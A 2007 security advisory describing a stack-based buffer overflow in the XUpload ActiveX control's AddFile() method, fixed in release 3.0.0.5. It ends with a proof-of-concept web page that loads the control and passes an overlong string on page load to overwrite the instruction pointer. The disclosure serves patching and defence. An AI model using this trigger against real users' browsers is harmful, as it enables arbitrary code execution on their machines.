XUpload stack-based buffer overflow vulnerability


Yorick Koster, June 2007

Abstract


A buffer overflow vulnerability exists in XUpload prior to version 3.0.0.5. This vulnerability allows attackers to execute arbitrary code with the privileges of the target user.

Fix


This issue was fixed in XUpload Service Release 3.0.0.5.

Introduction


The XUpload ActiveX control is a client-side component the can be loaded in Internet Explorer. XUpload is used to upload arbitrary files to a web server. It is used to overcome some of the limitations that exist when the regular upload functionality of the browser is used (<input type="file" ...). XUpload allows uploading multiple files and even recursively entire directories. XUpload is marked "Safe for scripting" and "Safe for initialization".

Stack-based buffer overflow


The AddFile() method of XUpload does not properly check the length of the given file. The file name is copied in a fixed size buffer on the stack. This allows an attacker to trigger a buffer overflow on the stack. This buffer overflow can be used to fully overwrite the saved instruction pointer on the stack (EIP), thus an attacker can change the execution path of XUpload. Consequently, an attacker can inject and execute arbitrary code. This code will be executed with the privileges of the target user. This issue is demonstrated through the following proof of concept:

<object id="XUpload" name="XUpload" width="0" height="0"
   classid="CLSID:E87F6C8E-16C0-11D3-BEF7-009027438003" codebase="XUpload.ocx">
<param name="Server" value="localhost">
<param name="Script" value="/upload.php">
</object>
<script type="text/javascript">
function StartUpload()
{
   var str = '';
   for(var i = 0; i < 1024; i++)
   {
      str += unescape('%u4141%u4141%u4141%u4141%u4141');
   }
   document.XUpload.AddFile(str);
}
   
window.onload = StartUpload;
</script>